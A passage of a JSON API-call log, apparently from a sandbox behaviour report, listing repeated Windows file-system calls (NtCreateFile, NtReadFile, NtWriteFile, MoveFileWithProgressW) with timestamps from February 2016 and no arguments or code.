"timestamp": "2016-02-16 17:42:01,060", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,060", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,060", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,060", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,060", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,060", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,060", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,060", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,070", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,070", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,070", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,070", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,070", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,070", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,070", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,070", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,070", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,070", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,070", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,080", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,080", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,080", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,080", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,080", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,080", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,080", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,080", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,080", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,080", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,090", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,090", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,090", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,090", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,090", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,090", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,090", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,090", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,090", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,090", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,090", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,100", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,100", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,100", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,100", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,100", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,100", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,100", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,100", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,110", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,110", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,110", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,110", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,110", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,110", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,110", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,110", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,110", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,110", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,110", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,120", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,120", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,120", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,120", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,120", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,120", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,120", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,120", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,130", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,130", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,130", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,130", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,130", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,130", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,130", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,130", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,140", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,140", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,140", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,140", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,140", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,140", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,140", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,140", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,150", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,150", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,150", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,150", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,150", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,150", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,150", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,150", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,190", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,190", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,190", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,190", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,190", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,190", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,190", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,190", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,190", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,190", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,200", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,210", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,210", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,210", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,210", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,210", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,210", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,210", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,210", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,220", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,230", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,230", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,240", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,240", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,240", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,240", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,240", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,250", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,250", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,250", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,250", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,260", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,260", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,260", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,260", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,260", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,260", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,260", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,260", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,260", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,260", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,260", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,270", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,270", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,270", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,270", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,270", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,270", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,270", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,280", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,280", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,280", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,280", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,280", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,280", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,290", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,290", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,290", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,290", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,290", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,290", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,300", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,300", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,300", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,300", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,300", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,310", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,320", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,320", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,320", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,320", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,320", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,320", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,340", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,340", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,340", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,340", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,350", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,350", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,350", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,350", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,350", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,360", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,360", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,360", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,360", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,360", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,360", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,360", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,360", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,370", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,370", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,370", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,370", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,370", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,370", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,370", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,370", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,370", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,370", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,370", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,380", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,380", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,380", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,380", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,380", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,380", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,380", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,380", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,390", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,390", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,390", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,390", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,390", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,390", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,390", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,390", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,390", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,400", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,400", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,400", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,400", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,400", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,400", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,400", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,410", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,410", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,410", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,410", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,410", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,410", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,410", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,410", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,420", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,420", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,420", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,420", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,420", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,420", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,430", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,430", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,430", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,430", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,430", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,440", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,440", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,440", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,440", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,440", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,440", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,440", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,440", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,440", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,451", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,451", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,461", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,461", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,461", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,461", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,461", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,461", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,461", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,471", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,481", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,481", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,481", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,481", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,481", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,481", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,481", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,491", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,491", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,491", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,491", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,491", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,491", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,491", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,501", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,501", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,501", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,501", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,501", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,511", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,511", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,511", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,511", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,511", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,521", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,521", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,521", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,521", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,521", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,521", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,521", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,521", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,531", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,531", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,531", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,531", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,531", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,531", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,531", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,541", "api": "MoveFileWithProgressW"}, {"category": "device", "timestamp": "2016-02-16 17:42:01,541", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,541", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,541", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,541", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,551", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,551", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,551", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,551", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,551", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,561", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,561", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,561", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,561", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,561", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,561", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,561", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,571", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,571", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,571", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,571", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,571", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,571", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,581", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,581", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,581", "api": 